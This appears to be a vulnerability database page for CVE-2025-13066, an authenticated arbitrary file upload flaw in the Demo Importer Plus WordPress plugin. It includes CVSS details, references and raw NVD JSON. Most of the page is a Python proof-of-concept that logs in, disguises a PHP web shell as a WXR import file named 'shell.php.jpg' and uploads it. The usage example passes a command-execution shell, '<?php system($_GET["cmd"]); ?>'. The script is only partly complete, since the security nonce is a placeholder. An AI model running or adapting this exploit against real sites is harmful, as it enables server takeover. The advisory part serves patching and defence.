CVE-2025-13066

Description

The Demo Importer Plus plugin for WordPress is vulnerable to arbitrary file upload in all versions up to, and including, 2.0.6. This is due to insufficient file type validation detecting WXR files, allowing double extension files to bypass sanitization while being accepted as a valid WXR file. This makes it possible for authenticated attackers, with author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Demo Importer Plus <= 2.0.6 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-13066 PoC - Demo Importer Plus Arbitrary File Upload
# Target: WordPress with Demo Importer Plus plugin <= 2.0.6

def exploit_cve_2025_13066(target_url, username, password, webshell_content):
    """
    Exploit for arbitrary file upload vulnerability in Demo Importer Plus
    
    Args:
        target_url: Target WordPress site URL
        username: WordPress author+ account username
        password: WordPress account password
        webshell_content: PHP code to be uploaded
    """
    
    session = requests.Session()
    
    # Step 1: Login to WordPress
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{target_url}/wp-admin/",
        'testcookie': '1'
    }
    
    print("[*] Attempting to login to WordPress...")
    response = session.post(login_url, data=login_data, allow_redirects=True)
    
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Login failed!")
        return False
    
    print("[+] Login successful!")
    
    # Step 2: Prepare malicious file with double extension
    # Create a file that bypasses WXR validation but contains PHP code
    malicious_filename = "shell.php.jpg"
    
    # WXR file structure with embedded PHP code
    wxr_content = f'''<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" 
	xmlns:wp="http://wordpress.org/export/1.2/">
  <channel>
    <title>Demo</title>
    <link>http://example.com</link>
    <description>Demo Import</description>
    <language>en-US</language>
    <wp:wxr_version>1.2</wp:wxr_version>
    <item>
      <title>Malicious Import</title>
      <link>http://example.com/post</link>
      <content:encoded><![CDATA[
{webshell_content}
]]></content:encoded>
    </item>
  </channel>
</rss>'''
    
    # Step 3: Upload the malicious file via Demo Importer Plus
    upload_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    files = {
        'demo_import_file': (malicious_filename, wxr_content.encode(), 'application/octet-stream')
    }
    
    data = {
        'action': 'demo_importer_plus_import',
        'security': 'nonce_value_here'  # Would need to fetch valid nonce
    }
    
    print("[*] Uploading malicious file...")
    
    try:
        response = session.post(upload_url, data=data, files=files, timeout=30)
        print(f"[+] Upload response: {response.status_code}")
        print(f"[*] Response content: {response.text[:500]}")
    except Exception as e:
        print(f"[-] Upload failed: {str(e)}")
        return False
    
    return True


if __name__ == "__main__":
    if len(sys.argv) < 5:
        print("Usage: python cve_2025_13066.py <target_url> <username> <password> <webshell>")
        print("Example: python cve_2025_13066.py http://target.com admin password '<?php system($_GET["cmd"]); ?>'")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    shell = sys.argv[4]
    
    exploit_cve_2025_13066(target, user, pwd, shell)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13066
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13066
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13066/
[4] VulDB https://vuldb.com/cve/CVE-2025-13066
[5] https://plugins.trac.wordpress.org/changeset/3400301/demo-importer-plus/trunk/inc/importers
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/7df0ea8a-5e2c-4f5e-a326-b92df37ffa3c?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13066", "sourceIdentifier": "[email protected]", "published": "2025-12-05T04:15:59.757", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Demo Importer Plus plugin for WordPress is vulnerable to arbitrary file upload in all versions up to, and including, 2.0.6. This is due to insufficient file type validation detecting WXR files, allowing double extension files to bypass sanitization while being accepted as a valid WXR file. This makes it possible for authenticated attackers, with author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3400301/demo-importer-plus/trunk/inc/importers", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7df0ea8a-5e2c-4f5e-a326-b92df37ffa3c?source=cve", "source": "[email protected]"}]}}